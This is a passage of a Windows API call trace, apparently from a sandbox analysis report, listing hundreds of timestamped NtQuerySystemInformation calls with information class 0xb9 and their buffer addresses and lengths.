SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0272.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0272.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd60, Length=0x28, ResultLength=0x0) [0272.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0272.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcde0, Length=0x28, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcde0, Length=0x28, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x20, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0272.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0272.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0272.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x20, ResultLength=0x0) [0272.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd0, Length=0x20, ResultLength=0x0) [0272.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd0, Length=0x20, ResultLength=0x0) [0272.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x50, ResultLength=0x0) [0272.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x50, ResultLength=0x0) [0272.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x50, ResultLength=0x0) [0272.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x50, ResultLength=0x0) [0272.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x50, ResultLength=0x0) [0272.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x50, ResultLength=0x0) [0272.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x50, ResultLength=0x0) [0272.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x38, ResultLength=0x0) [0272.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x28, ResultLength=0x0) [0272.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x28, ResultLength=0x0) [0272.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x28, ResultLength=0x0) [0272.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x28, ResultLength=0x0) [0272.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0272.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x38, ResultLength=0x0) [0272.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0272.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7a0, Length=0x20, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc720, Length=0x20, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc720, Length=0x20, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc720, Length=0x20, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x38, ResultLength=0x0) [0272.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x38, ResultLength=0x0) [0272.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0272.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0272.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0272.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0272.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0272.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0272.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0272.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0272.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0272.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0272.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0272.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0272.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0272.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0272.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0272.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0272.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0272.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0272.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0272.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0272.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0272.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0272.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0272.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0272.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0272.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0272.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0272.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0272.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0272.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0272.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0272.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0272.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0272.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0272.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0272.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0272.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0272.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0272.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0272.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0272.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0272.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x50, ResultLength=0x0) [0272.123] NtQuerySystemInformation 